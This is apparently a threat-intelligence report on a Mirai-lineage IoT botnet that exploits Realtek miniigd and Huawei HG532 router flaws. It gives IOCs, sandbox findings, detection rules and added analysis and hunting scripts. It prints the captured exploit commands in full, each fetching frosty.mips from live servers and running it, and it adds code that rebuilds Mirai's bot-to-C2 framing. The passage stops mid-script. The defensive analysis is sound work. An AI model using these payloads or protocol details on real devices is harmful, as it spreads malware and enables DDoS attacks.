TLP:CLEAR

FROSTY — Mirai-Lineage IoT Botnet

Active CVE exploitation campaign targeting Realtek miniigd and Huawei HG532 router fleets

Published: 2026-06-21
Source: cowrAI Honeypot Fleet (36 nodes)
Confidence: HIGH
Classification: Mirai Variant / IoT DDoS Botnet

Executive Summary

Key Finding
Since 2026-05-21, our 36-node distributed honeypot fleet has observed an active IoT botnet campaign distributing a Mirai-variant binary named frosty.mips. The campaign exploits two long-known vulnerabilities — CVE-2014-8361 (Realtek miniigd UPnP RCE) and CVE-2017-17215 (Huawei HG532 SOAP RCE) — to self-propagate across internet-exposed routers and IoT devices. With 33,431 events observed over 31 days across 36 geographically distributed sensors, the campaign is active and ongoing.

The operator runs two independent payload distribution servers (both Apache 2.4.6 on CentOS) and tags each infection with the exploit that produced it (realtek.selfrep / huawei.selfrep), which points to a structured rather than opportunistic operation. Both distributed binaries are Mirai variants: tria.ge scores each 10/10 with the Mirai_MIPS YARA rule, and VirusTotal flags the primary sample with 41/62 engines (the backup-server sample was still pending on VirusTotal at publication). The actual command-and-control server, 103.106.228.23:80, is separate from the distribution nodes and is connection-filtered: it accepts the TCP session but answers nothing to clients it does not recognise as bots.

Total events: 33,431
Days active: 31
Sensors hit: 36
VT detections: 41/62 (primary sample)
Triage score: 10/10 (both samples)
CVEs exploited: 2

Threat Actor Profile

The "FROSTY" operator has not been attributed to a named threat actor. Based on observed tradecraft, the operation exhibits the following characteristics:

Maturity Indicators
Structured, not opportunistic. Three indicators suggest an organised operator: (1) two independent payload distribution servers, each referenced by its own variant of the exploit payload, giving redundancy if one host is taken down; (2) per-device-family self-replication tagging (realtek.selfrep / huawei.selfrep) that lets the operator measure conversion by exploit type; (3) two binary builds of different sizes (111 KB and 120 KB), suggesting active development.
Attribute | Assessment | Confidence
Motivation | DDoS-for-hire or DDoS capability building (Mirai lineage) | HIGH
Sophistication | Intermediate: dual distribution infrastructure and selfrep tracking, but relies on CVEs from 2014 and 2017 | HIGH
Attribution | Unknown; no public naming; "frosty" branding not in public threat reports | MED
Target profile | Consumer/SOHO routers (Realtek SDK, Huawei HG532); primarily APAC/global ISP space | HIGH
Operational tempo | Continuous (observed every day since 2026-05-21); surge event 2026-06-17 | HIGH

Infrastructure Analysis

Scanner nodes (exploit delivery over HTTP SOAP/UPnP)
  45.194.67.8   dedicated Huawei scanner, 7,692 hits in one 8-hour window
  66.132.x.x    233 unique IPs, likely a compromised fleet
      |
      |  exploit lands; victim fetches the payload with wget / busybox wget
      v
  +-----------------------------+-----------------------------+
  | 109.104.153.60 (primary)    | 86.54.82.179 (backup)       |
  | Apache 2.4.6 / CentOS       | Apache 2.4.6 / CentOS       |
  | /bins/frosty.mips           | /bins/frosty.mips           |
  | 120,488 bytes               | 111,379 bytes               |
  | sample SHA2 (33efcefc...)   | sample SHA1 (f9b2997c...)   |
  +-----------------------------+-----------------------------+
      |
      |  bot executes and calls home
      v
  103.106.228.23:80 (bot C2)
    raw TCP, connection-filtered, silent to non-bot clients
    PCAP confirmed: ~4.3 KB of capture per sandbox session

Distribution Servers

IP | Role | Server | Binary served | SHA256 | Size | Directory listing
109.104.153.60 | Primary dist | Apache 2.4.6 (CentOS) | /bins/frosty.mips | 33efcefc… | 120,488 B | 403 Blocked
86.54.82.179 | Backup dist | Apache 2.4.6 (CentOS) | /bins/frosty.mips | f9b2997c… | 111,379 B | 403 Blocked

Both distribution nodes run Apache 2.4.6 on CentOS, which is the stock httpd build of CentOS 7, a release that reached end of life in June 2024. Directory listing is explicitly disabled (a request for the /bins/ index returns 403 Forbidden). The 9 KB size difference between the two binaries shows that the servers host different build revisions rather than identical copies.

Command and Control Server

Active C2
103.106.228.23:80 is the confirmed active C2, discovered via sandbox detonation of SHA2 (8 detonation runs, all reaching this IP). The binary connects on port 80 via raw TCP, not HTTP; each run produced roughly 4.3 KB of capture (capture-file size, not application payload). The C2 does not answer standard HTTP clients or port scanners (nmap, from a separate vantage point, reports 0 open ports), and it stays silent to our sandbox WARP egress IPs even though it accepts the TCP session from them. Since the connection itself succeeds, whatever filtering is in place is applied at least partly above the TCP layer: this is consistent with a Mirai-style C2 that only issues commands to sessions presenting the expected bot hello and ID, or with an allowlist enforced at the application layer.
IP | Port | Protocol | Nmap | Sandbox | Sessions observed
103.106.228.23 | 80/tcp | Raw TCP (Mirai C2) | 0 ports open | Connected / silent | 8 (3.4–4.6 KB capture each)

Scanner Infrastructure

IP / Range | Unique IPs | Hits (30d) | CVE focus | Notes
45.194.67.8 | 1 | 7,692 | CVE-2017-17215 | Dedicated Huawei scanner; hit 9 sensors in a single 8-hour window (2026-06-17). Single CVE only.
66.132.x.x | 233 | 3,469 | Both | Distributed scanning fleet, likely compromised hosts
216.180.x.x | 38 | 637 | Both |
199.45.x.x | 47 | 601 | Both |
152.32.x.x | 42 | 399 | Both |

Malware Analysis

Binary Samples

Sample ID | SHA256 | Architecture | Size | VirusTotal | Triage
SHA1 (86.x build) | f9b2997c80753505… | ELF 32-bit MSB MIPS | 111,379 B | Pending | 260621-wdaacaev3j (10/10)
SHA2 (109.x build) | 33efcefc39dabf81… | ELF 32-bit MSB MIPS | 120,488 B | 41/62 | 260617-weax9sdx3v (10/10)
Note: "SHA1" and "SHA2" are this report's sample labels, not hash algorithms; both digests are SHA-256 (full values in the File IOCs section).

VirusTotal Analysis (SHA2)

VT Verdict — 41/62 Engines
Popular threat label: trojan.mirai/ddos
Popular threat category: Trojan
Type: ELF
Scan date: 2026-06-21 06:04 UTC
Engine | Detection name
MicroWorld-eScan / BitDefender / GData | Gen:Variant.Linux.Mirai.1
Avast | ELF:Hajime-R [Trj]
Sophos / ZoneAlarm | Linux/DDoS-CIA
Skyhigh / Trellix (ENS) | Linux/Mirai.l
ALYac / VIPRE | Gen:Variant.Linux.Downloader.1

The Avast detection as ELF:Hajime-R is likely a misattributed family, a consequence of structural similarities between Mirai and Hajime; the consensus across the 11 other engines that name Mirai is more reliable. Sophos's Linux/DDoS-CIA is a generic DDoS family name with a sequential letter suffix (Sophos cycles -A, -B, ..., -CIA across variants); it carries no nation-state attribution.

Tria.ge Behavioral Analysis

Sample | Score | Family | YARA rule | MITRE TTPs | Signatures
SHA1 f9b2997c… | 10/10 | mirai | Mirai_MIPS | T1027, T1016 | Family: Mirai; XOR string obfuscation (Mozilla/5.0 keyword)
SHA2 33efcefc… | 10/10 | mirai | Mirai_MIPS | T1016 | Family: Mirai; System Network Configuration Discovery

The SHA1 sample uniquely triggers a signature for XOR-obfuscated strings, specifically a Mozilla/5.0 User-Agent string. Mirai variants commonly XOR-encode embedded strings (C2 address, User-Agent, attack and credential strings) with what amounts to a single-byte key to defeat a plain `strings` pass; the original source applies the four bytes of 0xdeadbeef in sequence, which reduces to a single key byte of 0x22, and variants simply swap the constant. The deobfuscated User-Agent is used in HTTP flood attack payloads.
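Recovering such strings without a sandbox is a short brute-force job. The example below is added here and is not code from the report or from frosty.mips: it tries every non-zero key byte over a blob and picks the one that exposes the most known Mirai plaintexts. The blob it runs on is constructed (a NUL-separated table obfuscated with Mirai's effective key 0x22, padded with a few bytes of MIPS code), and the known-plaintext list is an assumption about what a Mirai build carries, not strings taken from the sample.

```python
"""Recover single-byte-XOR-obfuscated strings from a Mirai-style blob.

Added example; not part of the cowrAI report and not code from frosty.mips.
The original Mirai source (bot/table.c) keeps its string table XORed with the
four bytes of 0xdeadbeef applied in turn, which collapses to one effective
key byte (0xde ^ 0xad ^ 0xbe ^ 0xef == 0x22). Variants change the key, so
this brute-forces all 255 non-zero keys and scores each candidate by how
many known Mirai plaintexts fall out. SAMPLE_BLOB is constructed below.
"""
from __future__ import annotations

import re

# Plaintexts a Mirai lineage almost always carries (assumption): the HTTP-flood
# User-Agent, /proc paths used for self-defence, busybox, telnet keywords.
KNOWN_PLAINTEXTS = [b"Mozilla/5.0", b"/proc/", b"/bin/busybox", b"enable", b"shell"]

MIRAI_EFFECTIVE_KEY = 0xDE ^ 0xAD ^ 0xBE ^ 0xEF  # == 0x22


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def printable_runs(data: bytes, min_len: int = 5) -> list[bytes]:
    """Runs of printable ASCII at least min_len long, like `strings -n`."""
    return [m.group(0) for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def recover_key(blob: bytes) -> tuple[int, list[bytes]]:
    """Return (key, recovered strings) for the key that exposes the most
    known plaintexts; ties are broken by the number of printable runs."""
    best_key, best_score, best_runs = 0, (-1, -1), []
    for key in range(1, 256):
        plain = xor_bytes(blob, key)
        known_hits = sum(1 for kp in KNOWN_PLAINTEXTS if kp in plain)
        runs = printable_runs(plain)
        score = (known_hits, len(runs))
        if score > best_score:
            best_key, best_score, best_runs = key, score, runs
    return best_key, best_runs


# Constructed fixture: a Mirai-style string table (NUL-terminated entries,
# terminators obfuscated too, as in table.c) surrounded by a few bytes of
# big-endian MIPS code. No strings from frosty.mips are reproduced here.
_PLAIN_TABLE = b"\x00".join([
    b"Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    b"/proc/net/tcp",
    b"/bin/busybox",
    b"enable",
    b"shell",
]) + b"\x00"
_MIPS_CODE = b"\x27\xbd\xff\xe0"  # addiu sp,sp,-32 (big-endian)
SAMPLE_BLOB = _MIPS_CODE + xor_bytes(_PLAIN_TABLE, MIRAI_EFFECTIVE_KEY) + _MIPS_CODE


def demo() -> dict:
    key, strings_found = recover_key(SAMPLE_BLOB)
    return {"key": key, "strings": [s.decode("ascii") for s in strings_found]}


if __name__ == "__main__":
    result = demo()
    print(f"recovered key: 0x{result['key']:02x}")
    for s in result["strings"]:
        print("  ", s)
```

On a real sample, feed `recover_key` the .rodata or .data section rather than the whole file, and extend `KNOWN_PLAINTEXTS` with whatever the triage signature already revealed (here, the Mozilla/5.0 fragment); a variant that uses a rolling or multi-byte key will score poorly for every single-byte candidate, which is itself a useful signal.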

Sandbox Detonation (cowrAI Sandbox — MIPS)

Detonation Notes
SHA2 was detonated 8 times in our MIPS sandbox environment (QEMU MIPS, WARP egress). On the first detonation (exec_ok=true, 300 s runtime) the binary connected to 103.106.228.23:80 and was killed at timeout. In the seven subsequent runs the binary reached the same C2 but received nothing (exit_kind: c2_silent_bail, the sandbox's classification for "C2 alive, bot silenced"). Our reading is that the C2 distinguishes known bots from new connections and withholds commands from unregistered or probing clients.
Run | Date (UTC) | C2 contacted | exec_ok | Outcome | PCAP size
1 | 2026-06-17 04:47 | 103.106.228.23:80 | true | kill (300 s timeout) | 3,429 B
2 | 2026-06-17 08:24 | 103.106.228.23:80 | false | c2_silent_bail | 4,181 B
3 | 2026-06-17 21:45 | 103.106.228.23:80 | false | c2_silent_bail | 4,556 B
4–8 | 2026-06-18 → 2026-06-21 | 103.106.228.23:80 | false | c2_silent_bail (all) | ~4.3 KB avg

The consistent ~4.3 KB capture across runs suggests a deterministic exchange: the bot sends its registration, the C2 accepts the session but issues no commands to sandbox/WARP-egress IPs. Note that the figure is the size of the capture file, not of the application payload: a Mirai-style hello is a handful of bytes, and most of the 4.3 KB is Ethernet/TCP framing, acknowledgements and keep-alive traffic accumulated over the 300 s run. In a real infection the bot would then sit idle until the operator issues a DDoS command.

Observed TTPs — MITRE ATT&CK

T1190
Exploit Public-Facing Application
CVE-2014-8361 (Realtek miniigd UPnP RCE), CVE-2017-17215 (Huawei HG532 SOAP RCE)
T1059
Command and Scripting Interpreter
Shell injection via SOAP/XML body. Commands delivered via HTTP POST to exposed management interfaces.
T1105
Ingress Tool Transfer
wget/busybox wget used to fetch frosty.mips from distribution C2 after initial exploitation.
T1027
Obfuscated Files or Information
XOR string obfuscation of embedded strings (C2 IP, User-Agent for HTTP flood). Confirmed by triage signature on SHA1.
T1016
System Network Config Discovery
Confirmed by triage behavioral analysis. In Mirai lineage this is post-exploitation host discovery, not reconnaissance: the bot resolves its own local address (util_local_addr in the original source) as soon as the C2 socket connects, before it sends its hello.
T1095
Non-Application Layer Protocol
Raw TCP C2
C2 communication on port 80 via raw TCP (not HTTP). ~4.3 KB handshake per session.
T1498
Network Denial of Service
Mirai variant — primary payload capability is DDoS (volumetric). VT label: trojan.mirai/ddos.
T1584.005
Compromise Infrastructure: Botnet
66.132.x.x /16 contributes 233 unique scanning IPs, likely compromised hosts reused as scanner infrastructure. (ATT&CK numbers the Botnet sub-technique .005; .001 is Domains.)

Activity Timeline

2026-05-21
First FROSTY campaign events observed in cowrAI fleet. CVE-2014-8361 + CVE-2017-17215 exploits begin arriving.
2026-06-16
cowrAI chase-runner fetches frosty.mips from 86.54.82.179 for the first time (SHA1). Open-dir probe returns 403. First sandbox detonation queued.
2026-06-17 03:17 UTC
Major surge event. Scanner node 45.194.67.8 hammers 9 fleet nodes with CVE-2017-17215 in an 8-hour window — 7,692 events from a single IP. cowrAI chase-runner independently fetches SHA2 from 109.104.153.60.
2026-06-17 04:47 UTC
First successful detonation of SHA2 in cowrAI MIPS sandbox. Binary runs for 300s, connects to 103.106.228.23:80. Real C2 IP identified.
2026-06-17 → present
Continuous lower-level scanning from the distributed fleet (66.132.x.x and others). Further detonation runs of SHA2 (runs 2–8 in the Sandbox Detonation table) all confirm the C2 is alive but silent to sandbox clients.
2026-06-21 06:04 UTC
SHA2 (33efcefc…) appears on VirusTotal for the first time — either submitted by another researcher or auto-uploaded. 41/62 engines detect as Mirai.
2026-06-21 (this report)
Both samples submitted to VirusTotal and tria.ge by cowrAI. Full reports published. Campaign ongoing as of report date.

Exploit Payloads

CVE-2014-8361 — Realtek miniigd UPnP RCE

Exploits the NewInternalClient parameter of the AddPortMapping action in Realtek's miniigd UPnP daemon (SOAP over TCP/52869). The parameter value reaches a shell unsanitised, so the XML body injects the command via backtick expansion in the parameter value.

# Primary C2 (109.104.153.60)
`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`

# Backup C2 (86.54.82.179)
`cd /var; rm -rf zuki; wget http://86.54.82.179/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`

CVE-2017-17215 — Huawei HG532 SOAP RCE

Exploits the NewStatusURL parameter of the Upgrade action in the Huawei HG532's DeviceUpgrade UPnP service (TR-064 based, TCP/37215); the value is expanded by the shell via $(...). The fetch uses the flags -g (host), -r (remote path) and -l (local path). These are not options of upstream BusyBox wget: the payload relies on the customised wget applet shipped in HG532 firmware, which is why the same command fails on a stock BusyBox target.

# Primary C2
$(/bin/busybox wget -g 109.104.153.60 -l /tmp/.frosty.mips -r /bins/frosty.mips; \
  /bin/busybox chmod 777 * /tmp/.frosty.mips; /tmp/.frosty.mips huawei.selfrep)

# Backup C2
$(/bin/busybox wget -g 86.54.82.179 -l /tmp/.frosty.mips -r /bins/frosty.mips; \
  /bin/busybox chmod 777 * /tmp/.frosty.mips; /tmp/.frosty.mips huawei.selfrep)
Self-Rep Argument Significance
The binary is launched with a positional argument identifying the exploit that installed it: realtek.selfrep or huawei.selfrep. In the original Mirai source (bot/main.c), argv[1] is copied into an id buffer when it is shorter than 32 bytes and sent to the C2 immediately after the 4-byte hello, so the operator can see which vulnerability each bot came in through and track which exploits are most productive for fleet growth. This is a distinguishing operational marker: not every Mirai variant passes a source tag, and the tag strings themselves are campaign-specific.
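The following is an added example, not code from the report and not recovered from frosty.mips. It spells out the wire format the two passages above lean on (the registration that the ~4.3 KB sandbox captures contain, and the place where the selfrep tag travels), using the framing of the leaked 2016 Mirai source: bot/main.c for the hello and keep-alive, cnc/main.go and cnc/bot.go for the C2 side. That FROSTY preserves this layout unchanged is an assumption; the report only established raw TCP on port 80 and a C2 that stays silent to sandbox clients. The command body in the demo is constructed.

```python
"""Bot hello and C2 framing as laid out in the leaked 2016 Mirai source.

Added example; not part of the cowrAI report and not recovered from
frosty.mips. Layout follows bot/main.c and cnc/main.go of the original
Mirai: after connect() the bot sends a 4-byte header 00 00 00 <version>,
then a 1-byte length and the id string copied from argv[1]; from then on
the bot sends a 2-byte zero keep-alive on a timer, the C2 echoes those two
bytes, and commands arrive as 2-byte big-endian length-prefixed frames
handed to attack_parse. Whether FROSTY keeps this layout unchanged is an
assumption.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass

MIRAI_VERSION = 0x01
MAX_CMD_LEN = 1024  # bot/main.c closes the session on anything larger


def build_hello(selfrep_id: str, version: int = MIRAI_VERSION) -> bytes:
    """Bot side: header plus length-prefixed argv[1] (bot/main.c keeps argv[1]
    only when strlen(argv[1]) < 32; an empty id is sent as a single 0x00)."""
    ident = selfrep_id.encode("ascii")
    if len(ident) >= 32:
        raise ValueError("id must be shorter than 32 bytes")
    return bytes([0, 0, 0, version, len(ident)]) + ident


@dataclass
class Hello:
    version: int
    source: str  # the selfrep tag, e.g. "huawei.selfrep"


def parse_hello(stream: bytes) -> Hello | None:
    """C2 side: None means "not a bot" (the original cnc then treats the
    connection as an operator login) or "need more bytes"."""
    if len(stream) < 5 or stream[:3] != b"\x00\x00\x00":
        return None
    version, id_len = stream[3], stream[4]
    if len(stream) < 5 + id_len:
        return None
    return Hello(version, stream[5:5 + id_len].decode("ascii", "replace"))


def bot_keepalive() -> bytes:
    """Sent by the bot when its select() times out: a zero length, nothing else."""
    return b"\x00\x00"


def c2_echo(ping: bytes) -> bytes:
    """cnc/bot.go reads exactly two bytes from the bot and writes them back."""
    return ping[:2]


def frame_command(payload: bytes) -> bytes:
    """C2 -> bot: u16 big-endian length, then the attack-command body."""
    if not 0 < len(payload) <= MAX_CMD_LEN:
        raise ValueError("command length out of range")
    return struct.pack(">H", len(payload)) + payload


def bot_read_frames(data: bytes) -> list[bytes]:
    """Bot side: zero-length frames (echoed keep-alives) are skipped; any
    other frame body would go to attack_parse. Raises on oversize frames,
    mirroring the bot dropping the connection."""
    commands, off = [], 0
    while off + 2 <= len(data):
        (n,) = struct.unpack_from(">H", data, off)
        off += 2
        if n == 0:
            continue
        if n > MAX_CMD_LEN:
            raise ValueError("oversize frame; bot would close the session")
        if off + n > len(data):
            break  # partial frame, wait for more bytes
        commands.append(data[off:off + n])
        off += n
    return commands


def demo_exchange(tag: str = "huawei.selfrep") -> dict:
    """Walk one session: hello tagged with the exploit that installed the bot,
    C2 parse, a keep-alive round trip, then one constructed command frame
    (in Mirai the body would be duration, vector, targets and options)."""
    hello = build_hello(tag)
    seen = parse_hello(hello)
    assert seen is not None
    c2_stream = c2_echo(bot_keepalive()) + frame_command(b"\x00\x00\x00\x3c\x0a\x00\x00")
    return {
        "hello_bytes": len(hello),  # 5 + len(tag): a handful of bytes, not kilobytes
        "source": seen.source,
        "version": seen.version,
        "commands": bot_read_frames(c2_stream),
    }


if __name__ == "__main__":
    print(demo_exchange())
```

Two things follow from the layout. A plain HTTP probe ("GET / ...") fails the three-zero-byte check, which is the simplest explanation for a C2 that stays silent to browsers and scanners, and the registration itself is only 5 + len(tag) bytes, so a 4.3 KB capture is almost entirely transport overhead rather than bot traffic.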

Indicators of Compromise

Network IOCs

Distribution C2 — Primary
109.104.153.60
Serves /bins/frosty.mips · Apache 2.4.6/CentOS
Distribution C2 — Backup
86.54.82.179
Serves /bins/frosty.mips · Apache 2.4.6/CentOS
Bot C2
103.106.228.23:80
Raw TCP C2 · Connection-filtered · PCAP confirmed active
Scanner — Primary
45.194.67.8
Dedicated Huawei scanner · 7,692 hits in 8h window
Payload URL
http://109.104.153.60/bins/frosty.mips
Primary payload delivery URL
Payload URL
http://86.54.82.179/bins/frosty.mips
Backup payload delivery URL

File IOCs

SHA256 | Filename | Size | Type | Source
33efcefc39dabf8181aaf22dfab876531a86beb077a0eb87c77c80c5dadf2fa3 | frosty.mips | 120,488 B | ELF 32-bit MSB MIPS | 109.104.153.60
f9b2997c80753505de598605fb8bdb2ac0abb095a20df9cd39623dd9ceb6a5cf | frosty.mips | 111,379 B | ELF 32-bit MSB MIPS | 86.54.82.179

Filesystem Artifacts

On-Device Artifacts
After successful exploitation, look for these on affected devices:
/var/zuki — temporary binary name used by Realtek exploit path
/tmp/.frosty.mips — temporary binary name used by Huawei exploit path (hidden file — note the leading dot)
Outbound TCP connections to 103.106.228.23:80 from IoT devices
Unexpected busybox invocations with wget -g <IP> -r /bins/ arguments in router logs
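A small hunt script for the artefacts listed above, added here as an example (not a cowrAI tool). It checks the two known drop paths and then flags any 32-bit big-endian MIPS ELF in a world-writable directory, identified from the ELF header fields that `file` reports as "ELF 32-bit MSB MIPS". It is meant to run over a mounted firmware image or extracted rootfs rather than on the router itself; the fixture it demonstrates on is a constructed temp tree with header-only stubs, and the outbound-connection check is left to `ss`/`netstat` on the device.

```python
"""Hunt for FROSTY on-device artefacts in an extracted filesystem.

Added example; not a cowrAI tool. Run it against a mounted firmware image,
an extracted rootfs, or a Linux host that can run Python (the affected
routers themselves cannot); pass the mount point as root. Two checks: the
drop paths the report lists, and any big-endian 32-bit MIPS ELF sitting in
a world-writable directory. The ELF check reads the header fields `file`
uses to print "ELF 32-bit MSB MIPS": EI_CLASS 1, EI_DATA 2, e_machine 8.
build_sample_tree() creates a constructed fixture with header-only stubs.
"""
from __future__ import annotations

import os
import stat
import struct
import tempfile
from dataclasses import dataclass

KNOWN_DROP_PATHS = ("/var/zuki", "/tmp/.frosty.mips")
ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFDATA2MSB, EM_MIPS = 1, 2, 8


@dataclass
class Finding:
    path: str
    reason: str


def is_mips_msb_elf(path: str) -> bool:
    """True if the file starts with an ELF32 big-endian header whose
    e_machine (offset 18, read big-endian because EI_DATA says so) is MIPS."""
    try:
        with open(path, "rb") as fh:
            hdr = fh.read(20)
    except OSError:
        return False
    if len(hdr) < 20 or hdr[:4] != ELF_MAGIC:
        return False
    if hdr[4] != ELFCLASS32 or hdr[5] != ELFDATA2MSB:
        return False
    (e_machine,) = struct.unpack_from(">H", hdr, 18)
    return e_machine == EM_MIPS


def hunt(root: str, drop_paths=KNOWN_DROP_PATHS) -> list[Finding]:
    findings: list[Finding] = []
    for rel in drop_paths:
        p = os.path.join(root, rel.lstrip("/"))
        if os.path.lexists(p):
            findings.append(Finding(p, "known FROSTY drop path"))
    seen = {f.path for f in findings}
    for dirpath, _dirs, files in os.walk(root):
        try:
            if not os.stat(dirpath).st_mode & stat.S_IWOTH:
                continue  # only world-writable dirs: Mirai drops into /tmp, /var, /dev
        except OSError:
            continue
        for name in files:
            p = os.path.join(dirpath, name)
            if p not in seen and is_mips_msb_elf(p):
                findings.append(Finding(p, "MIPS MSB ELF in world-writable directory"))
                seen.add(p)
    return findings


def build_sample_tree() -> str:
    """Constructed fixture. Returns the root of a temp tree containing a MIPS
    stub at the known Huawei drop path, a second hidden MIPS stub under an
    unknown name, a text file, a MIPS stub in non-writable /usr/bin (must not
    be flagged) and an x86-64 stub named /var/zuki (flagged by name only)."""
    root = tempfile.mkdtemp(prefix="frosty-hunt-")

    def ident(cls: int, data: int) -> bytes:  # 16-byte e_ident
        return ELF_MAGIC + bytes([cls, data, 1, 0]) + b"\x00" * 8

    mips = ident(ELFCLASS32, ELFDATA2MSB) + struct.pack(">HH", 2, EM_MIPS)
    x86_64 = ident(2, 1) + struct.pack("<HH", 2, 62)
    dirs = {"tmp": 0o1777, "tmp/.cache": 0o777, "usr/bin": 0o755, "var": 0o755}
    files = {
        "tmp/.frosty.mips": mips,
        "tmp/.cache/dropper": mips,
        "tmp/notes.txt": b"nothing to see",
        "usr/bin/legit": mips,
        "var/zuki": x86_64,
    }
    for rel in dirs:
        os.makedirs(os.path.join(root, rel), exist_ok=True)
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    for rel, mode in dirs.items():  # chmod after creation so umask does not interfere
        os.chmod(os.path.join(root, rel), mode)
    return root


def demo() -> dict[str, str]:
    """Run the hunt on the fixture; map relative path -> reason."""
    root = build_sample_tree()
    return {os.path.relpath(f.path, root): f.reason for f in hunt(root)}


if __name__ == "__main__":
    for path, reason in demo().items():
        print(f"{reason:42s} {path}")
```

Treat a hit as a triage lead, not a verdict: a MIPS ELF in /tmp on a MIPS router can be legitimate, so hash it against the File IOCs above before acting, and remember that a Mirai-lineage bot usually runs from memory only, so a clean filesystem after a reboot does not mean the device was never infected.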

CVE References

CVE | Vendor | Component | Description | First published
CVE-2014-8361 | Realtek | miniigd UPnP daemon (Realtek SDK) | RCE via command injection in the NewInternalClient parameter of the AddPortMapping SOAP action, reachable on TCP/52869. Affects Realtek SDK v1.3 / v2.0. CVSS 10.0. | 2015-04-08
CVE-2017-17215 | Huawei | HG532 DeviceUpgrade UPnP service (TR-064 based) | RCE via command injection in the NewStatusURL parameter of the Upgrade SOAP action, reachable on TCP/37215. Exploited in the wild by Satori/Okiru Mirai variants within weeks of disclosure. CVSS 8.8. | 2018-03-20

Mitigations and Detection

For Network Defenders

Action | Priority | Detail
Block distribution servers | HIGH | Block outbound HTTP to 109.104.153.60 and 86.54.82.179 at the perimeter. A request for the /bins/ path on either host is definitive.
Block bot C2 | HIGH | Block TCP to 103.106.228.23:80. Any device on your network reaching this IP is already infected; Mirai-lineage bots typically run from memory only, so a reboot clears the process but reinfection follows within minutes unless the exposed service is firewalled or the firmware updated.
Firewall the Huawei DeviceUpgrade endpoint (TCP/37215) | HIGH | CVE-2017-17215 is reached through the HG532's UPnP/TR-064 DeviceUpgrade service on TCP/37215; block it from the WAN. Also block TCP/7547 (TR-069/CWMP, abused by earlier TR-064 Mirai campaigns) and TCP/52869 (Realtek miniigd SOAP).
Firewall UPnP (SSDP UDP/1900 and miniigd TCP/52869) | HIGH | CVE-2014-8361 targets the Realtek miniigd SOAP endpoint on TCP/52869; SSDP on UDP/1900 is how the service is discovered. Disable UPnP on internet-facing interfaces and block both ports from the WAN.
Monitor for scanner IPs | MED | Alert on inbound connections from 45.194.67.8 and 66.132.0.0/16. Suppress known-good research scanners (Shodan/Censys prefixes) to reduce noise.
Hunt for filesystem artifacts | MED | Scan managed devices for /var/zuki, /tmp/.frosty.mips, and unexpected MIPS ELF files in world-writable directories.

Detection Signatures

# Suricata/Snort — payload delivery (any port; the distribution servers speak plain HTTP)
alert http any any -> any any (msg:"FROSTY Mirai payload download"; \
  flow:established,to_server; \
  content:"/bins/frosty.mips"; http_uri; \
  sid:9910001; rev:1;)

# Suricata/Snort — Huawei HG532 exploit inbound. CVE-2017-17215 is served on
# TCP/37215, not 7547. Suricata detects HTTP on any port; Snort needs 37215
# added to HTTP_PORTS for the http_client_body buffer to populate.
alert http any any -> $HOME_NET 37215 (msg:"FROSTY CVE-2017-17215 exploit attempt"; \
  flow:established,to_server; \
  content:"NewStatusURL"; http_client_body; \
  content:"frosty"; http_client_body; nocase; \
  sid:9910002; rev:2;)

# Suricata — outbound C2 beacon. Raw TCP, so no http keywords apply; the
# destination match alone is the signal.
alert tcp $HOME_NET any -> 103.106.228.23 80 (msg:"FROSTY Mirai C2 beacon"; \
  flow:established,to_server; sid:9910003; rev:1;)
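The rules above catch the download and the Huawei request; they do not cover the Realtek path, and they tell you nothing about where the payload was fetched from or dropped. The extractor below is an added example (not part of the report or of any cowrAI tool) that pulls the payload URL, on-device drop path and selfrep tag out of a captured SOAP body for both CVEs, using the two command shapes shown under Exploit Payloads. The SOAP envelopes it runs on are constructed fixtures wrapping the commands the report observed; the element and action names in them follow the public exploit format for each CVE.

```python
"""Extract payload URL, drop path and selfrep tag from captured SOAP exploit bodies.

Added example; not part of the report or of any cowrAI tool. It recognises
the two command shapes shown under Exploit Payloads (Realtek: `wget URL -O
name` then `./name tag`; Huawei: `wget -g HOST -l LOCAL -r REMOTE` then
`LOCAL tag`) inside a request body, so one extractor covers both CVEs. The
SOAP envelopes below are constructed fixtures; the commands, IPs and paths
in them are the ones the report observed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Drop:
    cve: str
    payload_url: str
    local_path: str
    tag: str | None


# Which vulnerable SOAP parameter the body targets decides the CVE label.
_CVE_MARKERS = [(b"<NewStatusURL>", "CVE-2017-17215"), (b"<NewInternalClient>", "CVE-2014-8361")]

# Realtek shape: GNU-style `wget URL -O name`, later `./name [tag]`.
_REALTEK = re.compile(
    rb"wget\s+(?P<url>https?://[^\s;&|`<]+)\s+-O\s+(?P<name>[^\s;&|`<]+)"
    rb".*?\./(?P=name)(?:\s+(?P<tag>[\w.]+))?",
    re.S,
)
# Huawei shape: HG532 wget `-g host -l local -r remote`, later `local [tag]`
# at the start of a shell command (after ; ( & or |), which skips the
# `chmod 777 * local` argument occurrence.
_HUAWEI = re.compile(
    rb"wget\s+-g\s+(?P<host>[^\s;&|)]+)\s+-l\s+(?P<local>[^\s;&|)]+)\s+-r\s+(?P<remote>[^\s;&|)]+)"
    rb".*?[;(&|]\s*(?P=local)(?:\s+(?P<tag>[\w.]+))?",
    re.S,
)
_CWD = re.compile(rb"(?:^|[;(&|`])\s*cd\s+(?P<dir>[^\s;&|`]+)")


def _s(m: re.Match, group: str) -> str | None:
    v = m.group(group)
    return v.decode("ascii", "replace") if v is not None else None


def extract_drop(body: bytes) -> Drop | None:
    """Drop details for an exploit body, or None for benign or unrecognised
    traffic (a NewStatusURL that is just a URL, for example)."""
    cve = next((c for marker, c in _CVE_MARKERS if marker in body), None)
    if cve is None:
        return None
    m = _HUAWEI.search(body)
    if m:
        return Drop(cve, f"http://{_s(m, 'host')}{_s(m, 'remote')}", _s(m, "local"), _s(m, "tag"))
    m = _REALTEK.search(body)
    if m:
        name = _s(m, "name")
        if not name.startswith("/"):  # relative drop name: resolve against the preceding cd
            cwd = _CWD.search(body[:m.start()])
            name = (_s(cwd, "dir").rstrip("/") + "/" if cwd else "") + name
        return Drop(cve, _s(m, "url"), name, _s(m, "tag"))
    return None


# Constructed SOAP envelopes wrapping the commands captured in the report.
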